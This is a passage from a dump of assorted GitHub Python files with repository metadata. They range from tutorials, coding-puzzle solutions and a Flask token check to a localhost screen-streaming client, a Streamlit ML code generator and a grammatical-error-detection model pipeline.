5\n assert count_cycle_length([0, 2, 7, 0]) == 4\n\n print(count_cycles(data))\n print(count_cycle_length(data))\n","repo_name":"matthewmckenna/advent2017","sub_path":"day06.py","file_name":"day06.py","file_ext":"py","file_size_in_byte":2373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"1246000033","text":"# ***Repeat with while***\ncount = 1\nwhile count <= 5:\n print(count)\n count += 1\n\n# ***Cancelling with break***\nwhile True:\n text = input(\"String to capitalize [type q to quit]: \")\n if text == 'q':\n break\n print(text.capitalize())\n\n# ***Skip ahead with continue***\n# this is a simple program that squares an input if odd\n# returns an appropriate message if even and continues to run\n\nwhile True:\n value = input(\"Integer, please [q to quit]: \")\n if value == 'q':\n break\n number = int(value)\n if number % 2 == 0: # even number\n print(\"Number is even, not what we want!\")\n continue\n print(f\"{number} squared is {number**2}\")\n \n# Check break Use with else\nnumbers = [1, 3, 5]\nposition = 0\nwhile position < len(numbers):\n number = numbers[position]\n if number % 2 == 0:\n print(\"Found even number\", number)\n break\n position += 1\nelse: # break not called\n print(\"No even number found\")\n\n# Iterating through strings\nword = \"thud\"\n# approach 1\noffset = 0\nwhile offset < len(word):\n print(word[offset])\n offset += 1\n\n# approach 2 (more pythonic)\nfor letters in word:\n print(letters) # string iteration produces one char at a time\n\n# breaking\nword = \"thud\"\nfor letter in word:\n if letter == 'u':\n break\n print(letter)\n# continue is same as in while()\n\n# checking break Use with else\nword = \"thud\"\nfor letter in word:\n if letter == 'x':\n print(\"Eek! 
An 'x'!\")\n break \n print(letter)\nelse:\n print(\"No 'x' in there\")\n\n# RANGE\nfor x in range(0, 3):\n print(x)\n\nprint(list(range(0, 3)))\n\n# printing/counting backwards\nfor x in range(2, -1, -1):\n print(x)\n\nprint(list(range(2, -1, -1)))\n\nprint(list(range(0, 11, 2)))\n","repo_name":"JoshAmpofo/python","sub_path":"loops.py","file_name":"loops.py","file_ext":"py","file_size_in_byte":1738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"43321172252","text":"# Import the needed Flask Modules\nfrom flask import request, jsonify\nfrom flask_httpauth import HTTPBasicAuth, HTTPTokenAuth\n\n# Import module db models\nfrom app.models import Tokens\n\n# Initialize HTTPTokenAuth\ntoken_auth = HTTPTokenAuth()\n\n# Do the token check\n@token_auth.verify_token\ndef verify_token(token):\n user = Tokens.check_token(token) if token else None\n return user is not None\n\n\n# Bail out error\n@token_auth.error_handler\ndef token_auth_error():\n return jsonify(error=\"Bad Token\"), 401\n","repo_name":"presianbg/soar-connector","sub_path":"xg-soar-engine/app/mod_api/api_auth.py","file_name":"api_auth.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"21295274809","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('aldryn_events', '0022_auto_20160109_1743'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='eventsconfigtranslation',\n name='app_title',\n field=models.CharField(default='', max_length=234, verbose_name='application title'),\n ),\n migrations.AlterField(\n model_name='registration',\n name='language_code',\n field=models.CharField(default='en', max_length=32, choices=[('en', 'English')]),\n ),\n ]\n","repo_name":"aldryn/aldryn-events","sub_path":"aldryn_events/migrations/0023_auto_20160212_1717.py","file_name":"0023_auto_20160212_1717.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"16"} +{"seq_id":"1841969437","text":"#계속 시간초과나서 pypy로 돌림,,\n#메모리:259740 시간:520ms\nimport sys\ninput=sys.stdin.readline\nN,M=map(int,input().split())\nliist=list(map(int,input().split()))\n\nstart=1\nend=max(liist)\n\nwhile start<=end:\n middle=(start+end)//2\n tree=0\n \n for i in liist:\n if i>=middle:\n tree+=i-middle\n \n if tree>=M:\n start=middle+1\n else:\n end=middle-1\nprint(end)\n \n","repo_name":"meeeeju/Python-Algorithm-Study","sub_path":"hyunji/BOJ/이진탐색/2805_나무자리기.py","file_name":"2805_나무자리기.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"42941309287","text":"import os\nimport io\nimport socket\nimport gzip\nimport time\nimport threading\n\nimport numpy as np\nimport PIL\nimport PIL.Image\nimport cv2\n\nDEFAULT_SERVER_PORT = 21578\n\nsocket_connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nsocket_connection.connect(('127.0.0.1', DEFAULT_SERVER_PORT))\n\n\nCV2_WINDOW_NAME = 'frame'\ncv2.namedWindow(CV2_WINDOW_NAME)\n\nREFRESH_RATE = 60\nWAIT_TIME_SECONDS = 1 / REFRESH_RATE\nWAIT_TIME_MILLISECONDS = int(WAIT_TIME_SECONDS * 1000)\n\nprint('REFRESH_RATE', REFRESH_RATE)\nprint('WAIT_TIME_SECONDS', WAIT_TIME_SECONDS)\n\nGLOBAL_STOP_FLAG = False\nCURRENT_FRAME = None\n\n\ndef 
cv2_ui_thread_function():\n while not GLOBAL_STOP_FLAG:\n if os.path.exists('stop'):\n break\n\n if CURRENT_FRAME is not None:\n cv2.imshow(CV2_WINDOW_NAME, CURRENT_FRAME)\n cv2.waitKey(WAIT_TIME_MILLISECONDS)\n\n\ncv2_ui_thread = threading.Thread(target=cv2_ui_thread_function)\ncv2_ui_thread.start()\n\n\nPENDING_DATA = b''\nMODIFY_PENDING_DATA_LOCK = threading.Lock()\n\n\ndef process_data_thread_function():\n global PENDING_DATA\n global CURRENT_FRAME\n\n while not GLOBAL_STOP_FLAG:\n if os.path.exists('stop'):\n break\n\n if len(PENDING_DATA) < 4:\n try:\n time.sleep(WAIT_TIME_SECONDS)\n except Exception as ex:\n print(ex)\n continue\n\n image_data_size_bs = PENDING_DATA[:4]\n image_data_size = int.from_bytes(image_data_size_bs, byteorder='little')\n if len(PENDING_DATA) < (4 + image_data_size):\n try:\n time.sleep(WAIT_TIME_SECONDS)\n except Exception as ex:\n print(ex)\n continue\n\n image_data_bs = PENDING_DATA[4:4 + image_data_size]\n with MODIFY_PENDING_DATA_LOCK:\n PENDING_DATA = PENDING_DATA[4 + image_data_size:]\n\n np_buffer = np.frombuffer(image_data_bs, dtype=np.uint8)\n frame = cv2.imdecode(np_buffer, cv2.IMREAD_COLOR)\n CURRENT_FRAME = frame\n\n\nprocess_data_thread = threading.Thread(target=process_data_thread_function)\nprocess_data_thread.start()\n\nwhile True:\n if os.path.exists('stop'):\n break\n\n bs = socket_connection.recv(65536)\n bs_len = len(bs)\n print(time.perf_counter_ns(), bs_len, end='\\r')\n if bs_len == 0:\n break\n\n with MODIFY_PENDING_DATA_LOCK:\n PENDING_DATA += bs\n","repo_name":"ichisadashioko/remotedesktop","sub_path":"deprecated/pythonclient/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2390,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"32884456548","text":"import streamlit as st\nimport os\nfrom sidebars.anomaly_detection_sidebars import kNN_ad_sidebar\nfrom sidebars.anomaly_detection_sidebars import LOF_sidebar\nfrom sidebars.anomaly_detection_sidebars import iForest_sidebar\nfrom sidebars.classification_sidebars import kNN_sidebar\nfrom sidebars.classification_sidebars import SVM_sidebar\nfrom sidebars.classification_sidebars import Logistic_Regression_sidebar\nfrom sidebars.classification_sidebars import RF_sidebar\nfrom sidebars.classification_sidebars import Decision_Trees_sidebar\nfrom sidebars.clustering_sidebars import DBSCAN_sidebar\nfrom sidebars.clustering_sidebars import KMEANS_sidebar\nfrom sidebars.clustering_sidebars import OPTICS_sidebar\nimport base64\nfrom jinja2 import Environment, FileSystemLoader\n\ndef header(text):\n l = int((70 - len(text))/2)\n return \"#\" + '='*(l-1) + \" \" + text + \" \" + '='*l\n\ndef download_button(code, filename, text=\"Download (.py)\"):\n # Reference: https://discuss.streamlit.io/t/how-to-download-file-in-streamlit/1806\n b64 = base64.b64encode(code.encode()).decode()\n href = f'{text}'\n st.markdown(href, unsafe_allow_html=True)\n\n# Page title.\nst.title(\"Machine Learning Code Generator\")\n#st.write(\"by Durgesh Samariya\")\n\"\"\"\n[![Star](https://img.shields.io/github/stars/durgeshsamariya/MLgenerator.svg?logo=github&style=social)](https://github.com/durgeshsamariya/MLgenerator/stargazers)\n [![GitHub issues](https://img.shields.io/github/issues/durgeshsamariya/MLgenerator.svg)](https://GitHub.com/durgeshsamariya/MLgenerator/issues/)\n [![made-with-python](https://img.shields.io/badge/Made%20with-Python-1f425f.svg)](https://www.python.org/)\n [![Made With 
Love](https://img.shields.io/badge/Made%20With-Love-orange.svg)](https://github.com/chetanraj/awesome-github-badges) \n [![Buy me a coffee](https://img.shields.io/badge/Buy%20me%20a%20coffee--yellow.svg?logo=buy-me-a-coffee&logoColor=orange&style=social)](https://www.buymeacoffee.com/themlphdstudent)\n\n\"\"\"\nst.markdown(\"-----\")\n\"\"\"\n\nGenerate your machine learning starter code in five simple steps. \n\n1. Select Task (Anomaly Detection or Classification or Clustering).\n2. Select Algorithm\n3. Specify data set and hyperparameters.\n4. Starter code will be generated below.\n5. Download the code.\n\"\"\"\nst.markdown(\"-----\")\n\n\ntemplates = {\n 'Anomaly Detection': {\n 'LOF': 'templates/Anomaly Detection/LOF',\n 'iForest': 'templates/Anomaly Detection/iForest',\n 'kNN': 'templates/Anomaly Detection/kNN'\n },\n 'Classification': {\n 'Logistic Regression': 'templates/Classification/Logistic Regression',\n 'kNN': 'templates/Classification/kNN',\n 'SVM': 'templates/Classification/SVM',\n 'Random Forest': 'templates/Classification/Random Forest',\n 'Decision Tree': 'templates/Classification/Decision Trees'\n },\n 'Clustering': {\n 'DBSCAN': 'templates/Clustering/DBSCAN',\n 'K-Means': 'templates/Clustering/K-Means',\n 'OPTICS': 'templates/Clustering/OPTICS',\n }\n}\n\nwith st.sidebar:\n st.write(\"## Choose Task\")\n task = st.selectbox(\"Task\", list(templates.keys()))\n if isinstance(templates[task], dict):\n algorithm = st.sidebar.selectbox(\n \"Which Algorithm?\", list(templates[task].keys())\n )\n template_path = templates[task][algorithm]\n else:\n template_path = templates[task]\n if task == \"Anomaly Detection\":\n if algorithm == 'LOF':\n inputs = LOF_sidebar()\n if algorithm == \"iForest\":\n inputs = iForest_sidebar()\n if algorithm == \"kNN\":\n inputs = kNN_ad_sidebar()\n if task == \"Classification\":\n if algorithm == \"Logistic Regression\":\n inputs = Logistic_Regression_sidebar()\n if algorithm == 'kNN':\n inputs = kNN_sidebar()\n if algorithm == 'SVM':\n inputs = SVM_sidebar()\n if algorithm == \"Random Forest\":\n inputs = RF_sidebar()\n if algorithm == \"Decision Tree\":\n inputs = Decision_Trees_sidebar()\n if task == \"Clustering\":\n if algorithm == \"DBSCAN\":\n inputs = DBSCAN_sidebar()\n if algorithm == \"K-Means\":\n inputs = KMEANS_sidebar()\n if algorithm == \"OPTICS\":\n inputs = OPTICS_sidebar()\n\nenv = Environment(loader=FileSystemLoader(template_path), trim_blocks=True, lstrip_blocks=True)\n\ntemplate = env.get_template(\"code-template.py.jinja\")\ncode = template.render(header=header, **inputs)\n\nfile_name = task.replace(\" \", \"_\") + \"_\" + algorithm.replace(\" \", \"_\") + \".py\"\ndownload_button(code, file_name.lower())\n\nst.code(code)","repo_name":"durgeshsamariya/MLgenerator","sub_path":"app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4690,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"16"} +{"seq_id":"12973859341","text":"import numpy as np\nfrom src.sorting.quickselect import select\n\ndef test_trivial():\n L = [1]\n selected = select(L, 0)\n assert selected == 1\n\ndef test_nontrivial():\n L = range(10)\n np.random.shuffle(L)\n selected = select(L, 5)\n assert selected == 5\n","repo_name":"coxj1990/algos","sub_path":"tests/sorting/test_quickselect.py","file_name":"test_quickselect.py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"37631370332","text":"import 
os\nimport random\nimport tarfile\n\nrandom.seed(1024)\n\n# parse arg from command line\ndatalist = os.sys.argv[1]\ndatatype = os.sys.argv[2]\nnum_gpus = int(os.sys.argv[3])\nnum_samples_per_tar = int(os.sys.argv[4]) # only used in shard mode\nnew_datalist = os.sys.argv[5]\n\nassert datatype in [\"shard\", \"raw\"]\n\n\nfiltered_list = []\nwith open(datalist, \"r\") as f:\n lines = f.readlines()\n lines = [l.strip() for l in lines]\n if datatype == \"raw\":\n valid_num = len(lines) // num_gpus * num_gpus\n random.shuffle(lines)\n filtered_list = lines[:valid_num]\n else:\n for line in lines:\n cnt = 0\n with open(line, \"rb\") as tar:\n stream = tarfile.open(fileobj=tar, mode=\"r|*\")\n for tarinfo in stream:\n name = tarinfo.name\n pos = name.rfind('.')\n assert pos > 0\n prefix, postfix = name[:pos], name[pos + 1:]\n if postfix == 'txt':\n cnt += 1\n if cnt == num_samples_per_tar:\n filtered_list.append(line)\n valid_num = len(filtered_list) // num_gpus * num_gpus\n random.shuffle(filtered_list)\n filtered_list = filtered_list[:valid_num]\n filtered_list.sort()\n print(\"before filter: {} after filter: {}\".format(len(lines), len(filtered_list)))\n\nwith open(new_datalist, \"w\") as f:\n for line in filtered_list:\n f.writelines(\"{}\\n\".format(line))\n","repo_name":"wenet-e2e/wenet","sub_path":"tools/filter_uneven_data.py","file_name":"filter_uneven_data.py","file_ext":"py","file_size_in_byte":1491,"program_lang":"python","lang":"en","doc_type":"code","stars":3402,"dataset":"github-code","pt":"16"} +{"seq_id":"5379744645","text":"#!/usr/bin/env python3\n# http://codekata.com/kata/kata08-conflicting-objectives/\n\nfrom sys import stderr\nfrom time import perf_counter\n\n\nflux_brut = open(\"dico.txt\")\nflux_épuré = map(str.strip, flux_brut)\ndictionnaire = set(flux_épuré)\n\ndef a_six_lettres(mot):\n\treturn len(mot) == 6\n\nmots_de_six_lettres = list(filter(a_six_lettres, dictionnaire))\n\npaires_de_mots = []\nintervalle = range(1, 6)\n\ntemps_début = perf_counter()\n\nfor stuff in range(64):\n\tfor mot in mots_de_six_lettres:\n\t\tfor curseur in intervalle:\n\t\t\tpréfixe = mot[:curseur]\n\t\t\tsuffixe = mot[curseur:]\n\t\t\tif (préfixe in dictionnaire and suffixe in dictionnaire):\n\t\t\t\tpaires_de_mots.append((préfixe, suffixe))\n\ntemps_fin = perf_counter()\n\t\t\t\nfor préfixe, suffixe in paires_de_mots:\n\tprint(préfixe, \"+\", suffixe, \"->\", préfixe+suffixe)\n\nprint(\"Time:\", temps_fin - temps_début, file=stderr)\n","repo_name":"okiwi/triple-dojo-association-mots-dictionnaire","sub_path":"performance-temoin.py","file_name":"performance-temoin.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"3603685589","text":"# https://leetcode.com/problems/champagne-tower/description/?envType=daily-question&envId=2023-09-24\n\nclass Solution:\n\n def champagneTower(self, poured: int, query_row: int, query_glass: int) -> float :\n dic = self.populateDefultDict()\n\n row = 0\n column = 0\n while poured :\n for per_column in range(0, column) :\n if dic[(row, per_column)][\"value\"] != 1 :\n dic[(row, per_column)][\"value\"] += 0.5 ** row\n else :\n row += 1\n dic[dic[(row - 1, per_column)][\"next1\"]][\"value\"] += 0.5 ** row\n dic[dic[(row - 1, per_column)][\"next2\"]][\"value\"] += 0.5 ** row\n\n\n return dic[(query_row, query_glass)][\"value\"]\n\n def populateDefultDict(self) -> dict:\n dic = {}\n for row in range(0, 100) :\n for column in range(0, 100) :\n dic[(row, column)] = { 
\"value\" : 0, \"next1\" : (row + 1, column), \"next2\" : (row + 1, column + 1)}\n return dic\n \n def doPoured(self, dic : dict, row, per_column) -> dict:\n for per_column in range(0, column) :\n if dic[(row, per_column)][\"value\"] != 1 :\n dic[(row, per_column)][\"value\"] += 0.5 ** row\n else :\n row += 1\n dic[dic[(row, per_column)][\"next1\"]][\"value\"] += 0.5 ** row\n dic[dic[(row, per_column)][\"next2\"]][\"value\"] += 0.5 ** row\n row = 0\n \n\nclass Solution2:\n \n def champagneTower(self, poured: int, query_row: int, query_glass: int) -> float:\n # Initialize a 2D array to represent the glasses\n glasses = [[0.0] * (query_row + 1) for _ in range(query_row + 1)]\n # Pour the initial amount of champagne into the top glass\n glasses[0][0] = poured\n # Simulate the flow of champagne from top to bottom\n for row in range(query_row):\n for glass in range(row + 1):\n excess = (glasses[row][glass] - 1) / 2.0\n if excess > 0:\n glasses[row + 1][glass] += excess\n glasses[row + 1][glass + 1] += excess\n # Ensure the value is between 0 and 1 (no more than one glass worth)\n return min(1.0, glasses[query_row][query_glass])\n\npoured1 = query_row1 = query_glass1 = 1\npoured2 , query_row2 , query_glass2 = (3 , 1 , 1)\npoured3 , query_row3 , query_glass3 = (100000009 , 33 , 17)\n\na = Solution2()\n#print(a.champagneTower(poured1 , query_row1 , query_glass1))\nprint(a.champagneTower(poured2 , query_row2 , query_glass2))\nprint(a.champagneTower(poured3 , query_row3 , query_glass3))","repo_name":"maslri/Algorithms","sub_path":"Champagne Tower.py","file_name":"Champagne Tower.py","file_ext":"py","file_size_in_byte":2669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"7303826324","text":"from furgonetes import Furgonetes\nfrom typing import List, Set, Generator\ndef visualitzar(estacions, n2):\n import matplotlib.pyplot as plt\n\n # Supongamos que tienes una instancia de la clase Estaciones llamada 'estacions'\n # y una instancia de la clase Estat llamada 'n2'\n\n # Extrae las coordenadas de las estaciones\n coordX = [estacion.coordX for estacion in estacions.lista_estaciones]\n coordY = [estacion.coordY for estacion in estacions.lista_estaciones]\n\n # Crea un gráfico de dispersión para mostrar las estaciones en el mapa\n plt.figure(figsize=(8, 8)) # Ajusta el tamaño del gráfico según tus preferencias\n plt.scatter(coordX, coordY, label=\"Estaciones\", color=\"blue\")\n\n # Personaliza el gráfico (etiquetas, título, ejes, etc.)\n plt.xlabel(\"Coordenada X\")\n plt.ylabel(\"Coordenada Y\")\n plt.title(\"Mapa de Estaciones\")\n\n # Agrega etiquetas a las estaciones\n for i, estacion in enumerate(estacions.lista_estaciones):\n plt.text(coordX[i], coordY[i], f\"Estacion {i+1}\", fontsize=8, ha='center', va='bottom')\n\n # Recorre las instancias de Furgonetes en n2.ruta\n for furgoneta in n2.ruta:\n if furgoneta.estacio_carrega is not None and furgoneta.estacio_descarrega1 is not None:\n # Trazar una línea desde estacio_carrega a estacio_descarrega1\n x1, y1 = furgoneta.estacio_carrega.coordX, furgoneta.estacio_carrega.coordY\n x2, y2 = furgoneta.estacio_descarrega1.coordX, furgoneta.estacio_descarrega1.coordY\n plt.plot([x1, x2], [y1, y2], color=\"red\", linewidth=1)\n\n if furgoneta.estacio_descarrega1 is not None and furgoneta.estacio_descarrega2 is not None:\n # Trazar una línea desde estacio_descarrega1 a estacio_descarrega2\n x1, y1 = furgoneta.estacio_descarrega1.coordX, furgoneta.estacio_descarrega1.coordY\n x2, y2 = 
furgoneta.estacio_descarrega2.coordX, furgoneta.estacio_descarrega2.coordY\n plt.plot([x1, x2], [y1, y2], color=\"green\", linewidth=1)\n\n # Muestra el gráfico\n plt.legend()\n plt.grid()\n plt.show()\n","repo_name":"gibertantentas/ABIA","sub_path":"visual.py","file_name":"visual.py","file_ext":"py","file_size_in_byte":2095,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"32005582440","text":"from transformers import AutoModelForTokenClassification\r\nfrom typing import List, Union, Tuple\r\n\r\nfrom utils import *\r\nfrom dataset import *\r\nfrom torch.utils.data import DataLoader\r\nfrom models import *\r\n\r\n\r\ndef map_to_df(texts:str) -> pd.DataFrame:\r\n if isinstance(texts, str):\r\n texts = [texts]\r\n return pd.DataFrame(data=texts, columns=['text'])\r\n\r\n\r\nclass POSTaggingPipeline:\r\n def __init__(self, model_name:str, data_configs=None):\r\n self.model = self._init_model(model_name)\r\n self.data_configs = data_configs if data_configs else self._get_default_data_configs(model_name)\r\n \r\n def _init_model(self, model_name):\r\n return AutoModelForTokenClassification.from_pretrained(model_name)\r\n\r\n def _get_default_data_configs(self, model_name):\r\n return {\r\n 'model_name':model_name,\r\n 'maxlength':128,\r\n 'train_val_split':-1,\r\n 'test':True, \r\n 'remove_username':False,\r\n 'remove_punctuation':False, \r\n 'to_simplified':False, \r\n 'emoji_to_text':False, \r\n 'split_words':False, \r\n 'cut_all':False, \r\n }\r\n\r\n def feedforward(\r\n self, \r\n ds:DatasetWithAuxiliaryEmbeddings, \r\n device:torch.device, \r\n ): \r\n from tqdm import tqdm\r\n\r\n if 'cuda' in device.type:\r\n self.model.cuda()\r\n\r\n logits = []\r\n dataloader = DataLoader(ds.dataset['train'].with_format('torch'), batch_size=16)\r\n\r\n for batch in tqdm(dataloader):\r\n inputs = {k:v.to(device) for k,v in batch.items()\r\n if k in ds.tokenizer.model_input_names or k == 'auxiliary_input_ids'}\r\n with torch.no_grad():\r\n output = self.model(**inputs)\r\n\r\n logits.append(output['logits'])\r\n return torch.concat(logits)\r\n\r\n def __call__(\r\n self, \r\n ds:DatasetWithAuxiliaryEmbeddings=None, \r\n texts:Union[List[str], str]=None, \r\n device:torch.device=torch.device('cpu'), \r\n return_tags=True, \r\n ): \r\n if ds is not None:\r\n if not isinstance(ds, DatasetWithAuxiliaryEmbeddings):\r\n raise TypeError('Passed data object is not a Dataset. 
Pass it as argument `texts` instead.')\r\n else:\r\n ds = DatasetWithAuxiliaryEmbeddings(df=map_to_df(texts), **self.data_configs)\r\n ds.prepare_dataset()\r\n logits = self.feedforward(ds, device)\r\n tag_ids = torch.argmax(logits, dim=2)\r\n if return_tags:\r\n return tag_ids\r\n ds.dataset['train'] = ds.dataset['train'].add_column(name='tag_ids', column=[id for id in tag_ids.cpu().numpy()])\r\n ds.dataset['train'] = ds.dataset['train'].add_column(name='emissions', column=logits.cpu().numpy().tolist())\r\n return ds\r\n \r\n\r\nclass PipelineGED:\r\n def __init__(self, model_name:str, oob_model_name=None, model_architecture:str='bert_with_clf_head', data_configs=None, pooling_mode='cls', **kwargs):\r\n # self.model = AutoModelForSequenceClassification.from_pretrained(\r\n # model_name, num_labels=2, \r\n # )\r\n \r\n if model_architecture == 'bert_with_clf_head':\r\n self.model = AutoModelBaseline(\r\n model_name, \r\n n_labels=2, \r\n **kwargs, \r\n )\r\n elif model_architecture == 'bert_word_based':\r\n self.model = AutoModelBaseline(\r\n model_name, \r\n n_labels=2, \r\n **kwargs, \r\n )\r\n # elif model_architecture == 'bert_with_crf_head':\r\n # self.model = BertWithCRFHead(\r\n # model_name, \r\n # n_labels=2, \r\n # )\r\n elif model_architecture == 'bert_with_oob_model':\r\n self.model = AutoModelWithOOBModel(\r\n model=model_name, \r\n oob_model=oob_model_name, \r\n n_labels=2, \r\n concatenate=True,\r\n **kwargs, \r\n )\r\n elif model_architecture == 'bert_with_bigru':\r\n self.model = AutoModelBiGRU(\r\n model=model_name, \r\n n_labels=2, \r\n **kwargs, \r\n )\r\n else:\r\n print(f'Model architecture {model_architecture} is not implemented.')\r\n if data_configs:\r\n self.data_configs = data_configs\r\n else:\r\n self.data_configs = {\r\n 'model_name':model_name,\r\n 'maxlength':128,\r\n 'train_val_split':-1,\r\n 'test':True, \r\n 'remove_username':False,\r\n 'remove_punctuation':False, \r\n 'to_simplified':False, \r\n 'emoji_to_text':False, \r\n 'split_words':False, \r\n 'cut_all':False, \r\n }\r\n if oob_model_name:\r\n self.data_configs['aux_model_name'] = oob_model_name\r\n self.model_architecture = model_architecture\r\n self.feedforward = self._feedforward_seq if model_architecture != 'bert_with_crf_head' else self._feedforward_token\r\n \r\n def _feedforward_seq(\r\n self, \r\n ds:DatasetWithAuxiliaryEmbeddings, \r\n checkpoints:List[str], \r\n device:torch.device, \r\n raw_outputs:bool=True, \r\n output_probabilities:bool=False, \r\n aggregate=True, \r\n ) -> np.ndarray:\r\n from tqdm import tqdm\r\n\r\n output_tensors = []\r\n for cp in checkpoints:\r\n state_dict = torch.load(cp, map_location=device)\r\n missing_keys, unexpected_keys = self.model.load_state_dict(state_dict, strict=False)\r\n if bool(missing_keys) | bool(unexpected_keys):\r\n print(f'Warning: state_dict does not match perfectly. 
\\nMissing keys: {missing_keys}\\nUnexpected keys: {unexpected_keys}')\r\n if 'cuda' in device.type:\r\n self.model.cuda()\r\n\r\n logits = []\r\n dataloader = DataLoader(ds.dataset['train'].with_format('torch'), batch_size=16)\r\n\r\n for batch in tqdm(dataloader):\r\n inputs = {k:v.to(device) for k,v in batch.items()\r\n if k in ds.tokenizer.model_input_names or k == 'auxiliary_input_ids'}\r\n with torch.no_grad():\r\n output = self.model(**inputs)\r\n logits.append(output['logits']) \r\n output_tensors.append(torch.concat(logits))\r\n output_logits_agg = torch.dstack(output_tensors)\r\n\r\n if aggregate:\r\n if output_probabilities:\r\n from torch.nn import Softmax\r\n return Softmax(dim=1)(output_logits_agg.mean(-1)).cpu().numpy(), \r\n if raw_outputs:\r\n return output_logits_agg.mean(-1).cpu().numpy()\r\n return output_logits_agg.mean(-1).argmax(1).cpu().numpy()\r\n return output_logits_agg\r\n \r\n def _feedforward_token(\r\n self, \r\n ds:DatasetWithAuxiliaryEmbeddings, \r\n checkpoints:List[str], \r\n device:torch.device, \r\n raw_outputs:bool=True, \r\n output_probabilities:bool=False, \r\n majority_vote=False, \r\n ) -> Tuple[np.ndarray]:\r\n output_tensors = []\r\n output_sequence_logits = []\r\n from tqdm import tqdm\r\n\r\n for cp in checkpoints:\r\n state_dict = torch.load(cp, map_location=device)\r\n # for key in list(state_dict.keys()):\r\n # state_dict[key.replace('bert', 'base_model')] = state_dict.pop(key)\r\n missing_keys, unexpected_keys = self.model.load_state_dict(state_dict, strict=False)\r\n if bool(missing_keys) | bool(unexpected_keys):\r\n print(f'Warning: state_dict does not match perfectly. \\nMissing keys: {missing_keys}\\nUnexpected keys: {unexpected_keys}')\r\n if 'cuda' in device.type:\r\n self.model.cuda()\r\n\r\n logits = []\r\n sequence_logits = []\r\n dataloader = DataLoader(ds.dataset['train'].with_format('torch'), batch_size=16)\r\n\r\n for batch in tqdm(dataloader):\r\n inputs = {k:v.to(device) for k,v in batch.items()\r\n if k in ds.tokenizer.model_input_names or k == 'auxiliary_input_ids'}\r\n with torch.no_grad():\r\n output = self.model(**inputs)\r\n try:\r\n logits.append(output['logits']) # not used\r\n sequence_logits.append(output['sequence_logits'])\r\n pass_logits = True\r\n except:\r\n logits.append(output['predictions'])\r\n pass_logits = False\r\n output_tensors.append(torch.concat(logits))\r\n if pass_logits:\r\n output_sequence_logits.append(torch.concat(sequence_logits, dim=0))\r\n if pass_logits:\r\n output_sequence_logits_agg = torch.stack(output_sequence_logits, dim=3).mean(-1)\r\n if self.model.pooling_mode == 'max':\r\n output_logits_agg = postprocess_logits(output_sequence_logits_agg, ds.dataset['train']['attention_mask'])\r\n elif self.model.pooling_mode == 'cls':\r\n output_logits_agg = output_sequence_logits_agg[:, 0, :]\r\n elif self.model.pooling_mode == 'hybrid':\r\n output = output_sequence_logits_agg[:, 0, :] + \\\r\n postprocess_logits(output_sequence_logits_agg, ds.dataset['train']['attention_mask'])\r\n else:\r\n raise NotImplementedError(f'pooling mode {self.model.pooling_mode} is not implemented.')\r\n if majority_vote:\r\n return voting(torch.stack(output_tensors))\r\n else:\r\n if output_probabilities:\r\n from torch.nn import Softmax\r\n \r\n return (\r\n Softmax(dim=1)(output_logits_agg).cpu().numpy(), \r\n Softmax(dim=2)(output_sequence_logits_agg).cpu().numpy(), \r\n )\r\n \r\n if raw_outputs:\r\n return (\r\n output_logits_agg.cpu().numpy(), \r\n output_sequence_logits_agg.mean(-1).cpu().numpy()\r\n )\r\n 
return (output_logits_agg.argmax(1).cpu().numpy(), output_sequence_logits_agg.mean(-1).argmax(2).cpu().numpy())\r\n else:\r\n assert majority_vote, 'Must use majority voting if model outputs labels directly.'\r\n pred_labels = torch.stack(output_tensors) # has shape (n_models, n_examples, seq_len). \r\n n_models, n_samples, seq_len = pred_labels.size()\r\n pred_labels_flattened = pred_labels.view((n_models, n_samples*seq_len))\r\n agg_labels = []\r\n for single_examples_pred_labels in pred_labels_flattened.T:\r\n labels, counts = torch.unique(single_examples_pred_labels, return_counts=True)\r\n agg_labels.append(labels[torch.argmax(counts)])\r\n seq_predictions = torch.tensor(agg_labels).view(n_samples, seq_len)\r\n predictions = torch.any(seq_predictions, dim=1).int()\r\n return predictions, seq_predictions\r\n\r\n def __call__(\r\n self, \r\n texts:Union[List[str], str], \r\n checkpoints:List[str], \r\n device:torch.device, \r\n raw_outputs:bool=True, \r\n output_probabilities:bool=False, \r\n display=True, \r\n majority_vote=False, \r\n aggregate=True, \r\n ) -> np.ndarray:\r\n test = DatasetWithAuxiliaryEmbeddings(df=map_to_df(texts), **self.data_configs)\r\n test.prepare_dataset()\r\n if majority_vote:\r\n return self.feedforward(test, checkpoints, device, raw_outputs, output_probabilities, majority_vote=True)\r\n if self.model_architecture == 'bert_with_crf_head':\r\n probs, seq_probs = self.feedforward(test, checkpoints, device, raw_outputs, output_probabilities)\r\n err_char_lst = self.display_error_chars(seq_probs, test, display=display)\r\n return probs, seq_probs, err_char_lst\r\n else:\r\n return self.feedforward(test, checkpoints, device, raw_outputs, output_probabilities, aggregate=aggregate)\r\n\r\n @staticmethod\r\n def display_error_chars(seq_probs, 